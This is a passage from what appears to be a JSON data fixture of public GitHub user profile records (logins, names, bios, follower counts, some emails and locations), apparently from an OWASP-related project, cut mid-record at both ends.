his knowledge. And gain knowledge for the people .", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 100, + "fields": { + "nest_created_at": "2024-09-11T19:36:52.255Z", + "nest_updated_at": "2024-09-22T20:26:11.554Z", + "name": "", + "login": "K0RSHAK", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108768069?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2022-07-05T22:17:09Z", + "updated_at": "2024-07-12T08:18:53Z", + "node_id": "U_kgDOBnurRQ", + "bio": "Engineer | Hacker | Enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 101, + "fields": { + "nest_created_at": "2024-09-11T19:36:53.134Z", + "nest_updated_at": "2024-09-11T19:36:53.134Z", + "name": "", + "login": "rookie720", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68784291?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-07-25T15:50:21Z", + "updated_at": "2024-09-06T03:45:49Z", + "node_id": "MDQ6VXNlcjY4Nzg0Mjkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 102, + "fields": { + "nest_created_at": "2024-09-11T19:36:54.369Z", + "nest_updated_at": "2024-09-11T19:36:54.369Z", + "name": "Michael Cade", + "login": "michaellcader", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1131078?v=4", + "company": "", + "location": "San Francisco", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 36, + "public_gists_count": 37, + "public_repositories_count": 240, + "created_at": "2011-10-16T07:46:51Z", + "updated_at": "2024-05-22T02:29:27Z", + "node_id": "MDQ6VXNlcjExMzEwNzg=", + "bio": "[work from home]", + "is_hireable": false, + "twitter_username": "MikeyLcade" + } +}, +{ + "model": "github.user", + "pk": 103, + "fields": { + "nest_created_at": "2024-09-11T19:36:55.624Z", + "nest_updated_at": "2024-09-11T19:36:55.624Z", + "name": "", + "login": "ghoss23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/121856569?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-01-03T08:38:20Z", + "updated_at": "2024-05-29T15:51:38Z", + "node_id": "U_kgDOB0NiOQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 104, + "fields": { + "nest_created_at": "2024-09-11T19:36:56.907Z", + "nest_updated_at": "2024-09-11T19:36:56.907Z", + "name": "", + "login": "Luis071727", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109968877?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-07-25T13:34:28Z", + "updated_at": "2023-10-10T12:44:20Z", + "node_id": "U_kgDOBo397Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 105, + "fields": { + "nest_created_at": "2024-09-11T19:36:58.141Z", + "nest_updated_at": "2024-09-11T19:36:58.141Z", + "name": "Anthony", + "login": "anthony-42crunch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/145518227?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-09-20T01:58:39Z", + "updated_at": "2024-08-27T05:11:28Z", + "node_id": "U_kgDOCKxukw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 106, + "fields": { + "nest_created_at": "2024-09-11T19:36:59.352Z", + "nest_updated_at": "2024-09-11T19:37:00.169Z", + "name": "", + "login": "zerodayhacker", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/111567927?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-08-19T09:18:33Z", + "updated_at": "2024-06-08T17:27:37Z", + "node_id": "U_kgDOBqZkNw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 107, + "fields": { + "nest_created_at": "2024-09-11T19:37:00.984Z", + "nest_updated_at": "2024-09-11T19:37:00.984Z", + "name": "Ractor", + "login": "Ractorrr", + "email": "ractorrr@proton.me", + "avatar_url": "https://avatars.githubusercontent.com/u/142397305?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2023-08-16T09:50:04Z", + "updated_at": "2024-03-17T09:18:20Z", + "node_id": "U_kgDOCHzPeQ", + "bio": "I'm on a quest to become a cybersecurity expert, one encryption key at a time.", + "is_hireable": false, + "twitter_username": "Ractorrrrr" + } +}, +{ + "model": "github.user", + "pk": 108, + "fields": { + "nest_created_at": "2024-09-11T19:37:01.371Z", + "nest_updated_at": "2024-09-22T19:23:10.391Z", + "name": "Roshan Piyush", + "login": "piyushroshan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1090436?v=4", + "company": "@Traceableai ", + "location": "Bangalore, Karnataka", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 49, + "public_gists_count": 2, + "public_repositories_count": 72, + "created_at": "2011-09-29T16:52:38Z", + "updated_at": "2024-08-20T08:05:05Z", + "node_id": "MDQ6VXNlcjEwOTA0MzY=", + "bio": "Security Research Engineer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 109, + "fields": { + "nest_created_at": "2024-09-11T19:37:02.651Z", + "nest_updated_at": "2024-09-11T19:37:02.651Z", + "name": "", + "login": "Danavivien", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/168714181?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-05-02T07:16:09Z", + "updated_at": "2024-05-02T07:16:09Z", + "node_id": "U_kgDOCg5fxQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 110, + "fields": { + "nest_created_at": "2024-09-11T19:37:03.924Z", + "nest_updated_at": "2024-09-11T19:37:03.924Z", + "name": "", + "login": "HemalKp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/160259837?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-02-16T16:03:38Z", + "updated_at": "2024-08-10T17:26:19Z", + "node_id": "U_kgDOCY1e_Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 111, + "fields": { + "nest_created_at": "2024-09-11T19:37:05.212Z", + "nest_updated_at": "2024-09-11T19:37:05.212Z", + "name": "CHERYL", + "login": "CHERYLMAISELOBO", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46939903?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-01-22T19:55:00Z", + "updated_at": "2024-07-15T10:03:27Z", + "node_id": "MDQ6VXNlcjQ2OTM5OTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 112, + "fields": { + "nest_created_at": "2024-09-11T19:37:06.491Z", + "nest_updated_at": "2024-09-22T19:23:08.588Z", + "name": "Arijit Dirghangi", + "login": "arijitdirghangi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50274322?v=4", + "company": "", + "location": "West Bengal", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2019-05-04T18:19:00Z", + "updated_at": "2024-09-03T09:08:45Z", + "node_id": "MDQ6VXNlcjUwMjc0MzIy", + "bio": "Bash Lover ❄️ Bug Hunter ❄️ eJPT ❄️ eWPTXv2 ❄️ Love to learn new things 🥰 ", + "is_hireable": false, + "twitter_username": "Arijit_Dir" + } +}, +{ + "model": "github.user", + "pk": 113, + "fields": { + "nest_created_at": "2024-09-11T19:38:22.207Z", + "nest_updated_at": "2024-09-22T19:44:05.460Z", + "name": "Johan Sydseter", + "login": "sydseter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1244005?v=4", + "company": "Admincontrol AS", + "location": "Oslo", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 19, + "public_repositories_count": 54, + "created_at": "2011-12-06T09:15:17Z", + "updated_at": "2024-09-20T17:40:00Z", + "node_id": "MDQ6VXNlcjEyNDQwMDU=", + "bio": "Johan Sydseter, Co-leader for Cornucopia, Application Security Engineer, Developer, Architect and SecDevOps.", + "is_hireable": false, + "twitter_username": "JSydseter" + } +}, +{ + "model": "github.user", + "pk": 114, + "fields": { + "nest_created_at": "2024-09-11T19:38:23.849Z", + "nest_updated_at": "2024-09-16T20:01:34.001Z", + "name": "", + "login": "pixeebot[bot]", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/in/193111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-04-20T20:09:19Z", + "updated_at": "2022-11-15T17:37:09Z", + "node_id": "BOT_kgDOBjR4BA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 115, + "fields": { + "nest_created_at": "2024-09-11T19:39:35.445Z", + "nest_updated_at": "2024-09-22T16:24:12.666Z", + "name": "Mouhcine", + "login": "monba08", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32450677?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-10-02T08:54:33Z", + "updated_at": "2024-08-20T10:26:22Z", + "node_id": "MDQ6VXNlcjMyNDUwNjc3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 116, + "fields": { + "nest_created_at": "2024-09-11T19:39:46.448Z", + "nest_updated_at": "2024-09-22T20:30:11.647Z", + "name": "Harold Blankenship", + "login": "hblankenship", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36673698?v=4", + "company": "OWASP Foundation", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 101, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-02-20T17:24:57Z", + "updated_at": "2024-08-27T13:10:35Z", + "node_id": "MDQ6VXNlcjM2NjczNjk4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 117, + "fields": { + "nest_created_at": "2024-09-11T19:39:48.151Z", + "nest_updated_at": "2024-09-22T20:30:10.685Z", + "name": "Steve Springett", + "login": "stevespringett", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3878933?v=4", + "company": "@ServiceNow", + "location": "Chicago", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 359, + "public_gists_count": 4, + "public_repositories_count": 30, + "created_at": "2013-03-15T22:01:22Z", + "updated_at": "2024-09-19T02:47:52Z", + "node_id": "MDQ6VXNlcjM4Nzg5MzM=", + "bio": "I build stuff, I break stuff, I develop stuff to protect stuff.\r\n\r\nCreator of @DependencyTrack. Chair of @CycloneDX and @Ecma-TC54. Core team of @package-url", + "is_hireable": false, + "twitter_username": "stevespringett" + } +}, +{ + "model": "github.user", + "pk": 118, + "fields": { + "nest_created_at": "2024-09-11T19:40:14.554Z", + "nest_updated_at": "2024-09-22T16:24:39.463Z", + "name": "dev4mobile", + "login": "dev4mobile", + "email": "cn.dev4mobile@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6851386?v=4", + "company": "@dev4mobile", + "location": "Unknown", + "collaborators_count": 0, + "following_count": 455, + "followers_count": 54, + "public_gists_count": 5, + "public_repositories_count": 44, + "created_at": "2014-03-04T14:06:43Z", + "updated_at": "2024-09-18T11:26:47Z", + "node_id": "MDQ6VXNlcjY4NTEzODY=", + "bio": "unknown", + "is_hireable": true, + "twitter_username": "dev4mobiles" + } +}, +{ + "model": "github.user", + "pk": 119, + "fields": { + "nest_created_at": "2024-09-11T19:40:32.778Z", + "nest_updated_at": "2024-09-22T19:23:20.255Z", + "name": "Jason Axley", + "login": "jaxley", + "email": "jason@axley.net", + "avatar_url": "https://avatars.githubusercontent.com/u/414771?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 7, + "public_repositories_count": 30, + "created_at": "2010-09-24T19:09:19Z", + "updated_at": "2024-08-23T18:23:50Z", + "node_id": "MDQ6VXNlcjQxNDc3MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 120, + "fields": { + "nest_created_at": "2024-09-11T19:41:21.148Z", + "nest_updated_at": "2024-09-11T19:41:21.148Z", + "name": "Mackenzie Jackson", + "login": "techwithmack", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60846695?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2020-02-09T13:40:24Z", + "updated_at": "2024-09-06T14:47:45Z", + "node_id": "MDQ6VXNlcjYwODQ2Njk1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 121, + "fields": { + "nest_created_at": "2024-09-11T19:41:22.804Z", + "nest_updated_at": "2024-09-22T18:43:27.358Z", + "name": "Mike Woudenberg", + "login": "mikewoudenberg", + "email": "mwoudenberg@xebia.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5583336?v=4", + "company": "@xebia ", + "location": "Schagen", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 21, + "public_gists_count": 5, + "public_repositories_count": 21, + "created_at": "2013-10-01T07:39:41Z", + "updated_at": "2024-09-17T14:12:00Z", + "node_id": "MDQ6VXNlcjU1ODMzMzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 122, + "fields": { + "nest_created_at": "2024-09-11T19:41:27.379Z", + "nest_updated_at": "2024-09-22T18:42:56.527Z", + "name": "Jangala Sai Sri Ram", + "login": "jangalasriramd7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58134292?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2019-11-24T09:53:20Z", + "updated_at": "2024-09-22T18:12:28Z", + "node_id": "MDQ6VXNlcjU4MTM0Mjky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 123, + "fields": { + "nest_created_at": "2024-09-11T19:41:31.654Z", + "nest_updated_at": "2024-09-22T18:43:26.726Z", + "name": "Madhu Akula", + "login": "madhuakula", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6764192?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 702, + "followers_count": 955, + "public_gists_count": 48, + "public_repositories_count": 110, + "created_at": "2014-02-23T17:13:33Z", + "updated_at": "2024-08-29T21:30:15Z", + "node_id": "MDQ6VXNlcjY3NjQxOTI=", + "bio": "Pragmatic Security Leader | Author, Speaker & Trainer @ BlackHat, DEFCON, USENIX, OWASP, SANS, etc. | Securing Cloud Native, Containers, Kubernetes, Infra, Apps", + "is_hireable": false, + "twitter_username": "madhuakula" + } +}, +{ + "model": "github.user", + "pk": 124, + "fields": { + "nest_created_at": "2024-09-11T19:41:33.310Z", + "nest_updated_at": "2024-09-22T20:23:46.456Z", + "name": "Nanne Baars", + "login": "nbaars", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/493861?v=4", + "company": "Xebia", + "location": "Netherlands", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 49, + "public_gists_count": 1, + "public_repositories_count": 68, + "created_at": "2010-11-23T19:02:30Z", + "updated_at": "2024-03-17T09:49:40Z", + "node_id": "MDQ6VXNlcjQ5Mzg2MQ==", + "bio": "Project leader of WebGoat", + "is_hireable": false, + "twitter_username": "OWASP_WebGoat" + } +}, +{ + "model": "github.user", + "pk": 125, + "fields": { + "nest_created_at": "2024-09-11T19:41:33.697Z", + "nest_updated_at": "2024-09-22T18:43:00.711Z", + "name": "Marcin Nowak", + "login": "drnow4u", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4015708?v=4", + "company": "ING", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 41, + "created_at": "2013-03-30T21:19:32Z", + "updated_at": "2024-09-21T15:40:41Z", + "node_id": "MDQ6VXNlcjQwMTU3MDg=", + "bio": "PhD | Time-Series Data Scientist | FinTech | Robust Application Developer", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 126, + "fields": { + "nest_created_at": "2024-09-11T19:41:39.477Z", + "nest_updated_at": "2024-09-22T20:22:24.684Z", + "name": "za", + "login": "za", + "email": "za@python.or.id", + "avatar_url": "https://avatars.githubusercontent.com/u/409455?v=4", + "company": "", + "location": "Jakarta, Indonesia", + "collaborators_count": 0, + "following_count": 119, + "followers_count": 93, + "public_gists_count": 44, + "public_repositories_count": 179, + "created_at": "2010-09-21T07:17:27Z", + "updated_at": "2024-08-15T07:42:21Z", + "node_id": "MDQ6VXNlcjQwOTQ1NQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 127, + "fields": { + "nest_created_at": "2024-09-11T19:41:44.021Z", + "nest_updated_at": "2024-09-22T18:43:23.535Z", + "name": "Osama Magdy", + "login": "osamamagdy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59124937?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 87, + "followers_count": 119, + "public_gists_count": 1, + "public_repositories_count": 122, + "created_at": "2019-12-21T20:48:03Z", + "updated_at": "2024-09-16T12:06:10Z", + "node_id": "MDQ6VXNlcjU5MTI0OTM3", + "bio": "Senior DevOps Engineer @ VOIS | Open Source Enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 128, + "fields": { + "nest_created_at": "2024-09-11T19:41:49.493Z", + "nest_updated_at": "2024-09-22T18:43:15.633Z", + "name": "Puneeth", + "login": "puneeth072003", + "email": "pyd773@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/119479391?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 18, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2022-11-30T06:25:27Z", + "updated_at": "2024-08-23T18:10:15Z", + "node_id": "U_kgDOBx8cXw", + "bio": "", + "is_hireable": false, + "twitter_username": "Puneeth072003" + } +}, +{ + "model": "github.user", + "pk": 129, + "fields": { + "nest_created_at": "2024-09-11T19:41:51.176Z", + "nest_updated_at": "2024-09-11T19:41:51.176Z", + "name": "Divyanshu Agarwal", + "login": "divyanshuagarwal-23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73509365?v=4", + "company": "", + "location": "India", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2020-10-27T02:07:35Z", + "updated_at": "2024-08-14T15:34:16Z", + "node_id": "MDQ6VXNlcjczNTA5MzY1", + "bio": "Computer Science Under Graduate Student", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 130, + "fields": { + "nest_created_at": "2024-09-11T19:41:53.222Z", + "nest_updated_at": "2024-09-22T18:43:01.353Z", + "name": "Shubham Patel", + "login": "Shubham-Patel07", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87226371?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2021-07-10T09:17:48Z", + "updated_at": "2024-09-17T18:11:58Z", + "node_id": "MDQ6VXNlcjg3MjI2Mzcx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 131, + "fields": { + "nest_created_at": "2024-09-11T19:42:04.672Z", + "nest_updated_at": "2024-09-22T18:43:02.998Z", + "name": "", + "login": "neatzsche", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36679710?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-02-20T21:25:46Z", + "updated_at": "2024-05-24T13:45:29Z", + "node_id": "MDQ6VXNlcjM2Njc5NzEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 132, + "fields": { + "nest_created_at": "2024-09-11T19:43:35.812Z", + "nest_updated_at": "2024-09-22T20:25:45.018Z", + "name": "Dominique RIGHETTO", + "login": "righettod", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1573775?v=4", + "company": "@ExcelliumSA ", + "location": "Luxemburg", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 309, + "public_gists_count": 29, + "public_repositories_count": 52, + "created_at": "2012-03-25T17:35:20Z", + "updated_at": "2024-06-02T06:37:06Z", + "node_id": "MDQ6VXNlcjE1NzM3NzU=", + "bio": "🌎 righettod.eu", + "is_hireable": false, + "twitter_username": "righettod" + } +}, +{ + "model": "github.user", + "pk": 133, + "fields": { + "nest_created_at": "2024-09-11T19:44:18.872Z", + "nest_updated_at": "2024-09-22T19:45:42.177Z", + "name": "Garth Boyd", + "login": "garthoid", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3218382?v=4", + "company": "", + "location": "Canada", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2013-01-08T18:17:22Z", + "updated_at": "2024-09-14T01:28:16Z", + "node_id": "MDQ6VXNlcjMyMTgzODI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 134, + "fields": { + "nest_created_at": "2024-09-11T20:08:03.559Z", + "nest_updated_at": "2024-09-22T19:32:47.319Z", + "name": "Tyler M", + "login": "tmart234", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63220256?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2020-04-06T03:40:52Z", + "updated_at": "2024-09-04T04:14:20Z", + "node_id": "MDQ6VXNlcjYzMjIwMjU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 135, + "fields": { + "nest_created_at": "2024-09-11T20:08:05.234Z", + "nest_updated_at": "2024-09-11T21:41:37.276Z", + "name": "Gøran Breivik", + "login": "gobrtg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46678380?v=4", + "company": "Transcendent Group", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-01-14T13:32:50Z", + "updated_at": "2024-06-03T10:35:36Z", + "node_id": "MDQ6VXNlcjQ2Njc4Mzgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 136, + "fields": { + "nest_created_at": "2024-09-11T20:08:07.375Z", + "nest_updated_at": "2024-09-22T19:32:35.280Z", + "name": "Leo", + "login": "lreading", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5851985?v=4", + "company": "", + "location": "NH", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 33, + "created_at": "2013-11-04T15:23:01Z", + "updated_at": "2024-09-13T14:12:47Z", + "node_id": "MDQ6VXNlcjU4NTE5ODU=", + "bio": "Builder, breaker, nerd.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 137, + "fields": { + "nest_created_at": "2024-09-11T20:08:07.870Z", + "nest_updated_at": "2024-09-22T17:31:38.790Z", + "name": "Patrick Peters", + "login": "ppeters0502", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6621379?v=4", + "company": "", + "location": "Council Bluffs, IA", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 49, + "created_at": "2014-02-08T02:01:58Z", + "updated_at": "2024-06-18T03:37:35Z", + "node_id": "MDQ6VXNlcjY2MjEzNzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 138, + "fields": { + "nest_created_at": "2024-09-11T20:08:13.460Z", + "nest_updated_at": "2024-09-11T20:08:13.460Z", + "name": "", + "login": "saurabhlime", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/96544391?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2021-12-22T18:02:49Z", + "updated_at": "2024-09-09T18:48:03Z", + "node_id": "U_kgDOBcEmhw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 139, + "fields": { + "nest_created_at": "2024-09-11T20:08:17.732Z", + "nest_updated_at": "2024-09-22T16:47:00.860Z", + "name": "Steven Carlson", + "login": "RockRunner007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5983974?v=4", + "company": "Fivetran", + "location": "Lincoln, Ne", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 34, + "created_at": "2013-11-19T19:50:08Z", + "updated_at": "2024-08-11T15:53:53Z", + "node_id": "MDQ6VXNlcjU5ODM5NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 140, + "fields": { + "nest_created_at": "2024-09-11T20:08:24.149Z", + "nest_updated_at": "2024-09-22T19:32:41.101Z", + "name": "dpopes", + "login": "danielpops", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10519220?v=4", + "company": "@Yelp", + "location": "San Francisco", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 61, + "public_gists_count": 4, + "public_repositories_count": 79, + "created_at": "2015-01-13T17:40:03Z", + "updated_at": "2024-09-01T11:28:15Z", + "node_id": "MDQ6VXNlcjEwNTE5MjIw", + "bio": "Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 141, + "fields": { + "nest_created_at": "2024-09-11T20:08:24.541Z", + "nest_updated_at": "2024-09-22T19:32:36.883Z", + "name": "Steve Winter", + "login": "steve-winter", + "email": "steve.winter7@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2458106?v=4", + "company": "", + "location": "Brisbane, Australia", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2012-09-30T16:56:24Z", + "updated_at": "2024-08-25T14:07:25Z", + "node_id": "MDQ6VXNlcjI0NTgxMDY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 142, + "fields": { + "nest_created_at": "2024-09-11T20:08:27.077Z", + "nest_updated_at": "2024-09-22T20:24:32.503Z", + "name": "Martin Marsicano", + "login": "martinmarsicano", + "email": "martin.marsicano@owasp.org", + "avatar_url": "https://avatars.githubusercontent.com/u/33671308?v=4", + "company": "Nexa, OWASP", + "location": "Montevideo, Uruguay", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2017-11-14T21:09:33Z", + "updated_at": "2024-08-19T01:01:03Z", + "node_id": "MDQ6VXNlcjMzNjcxMzA4", + "bio": "Nexa S-SDLC Specialist.\r\nOWASP Lifetime Member, former OWASP Uruguay Chapter Leader and several projects contributor.", + "is_hireable": false, + "twitter_username": "MarsicanoMartin" + } +}, +{ + "model": "github.user", + "pk": 143, + "fields": { + "nest_created_at": "2024-09-11T20:08:46.053Z", + "nest_updated_at": "2024-09-11T20:08:46.441Z", + "name": "Aadyaa Maddi", + "login": "amad-person", + "email": "aadyaa.maddi@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22164211?v=4", + "company": "Rockfish Data", + "location": "Pittsburgh", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 32, + "public_gists_count": 2, + "public_repositories_count": 32, + "created_at": "2016-09-13T04:07:33Z", + "updated_at": "2024-09-03T15:59:03Z", + "node_id": "MDQ6VXNlcjIyMTY0MjEx", + "bio": "Making things more private\r\n\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 144, + "fields": { + "nest_created_at": "2024-09-11T20:08:48.184Z", + "nest_updated_at": "2024-09-11T20:08:48.185Z", + "name": "Jos Purvis", + "login": "jospurvis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107133131?v=4", + "company": "@fastly ", + "location": "", + 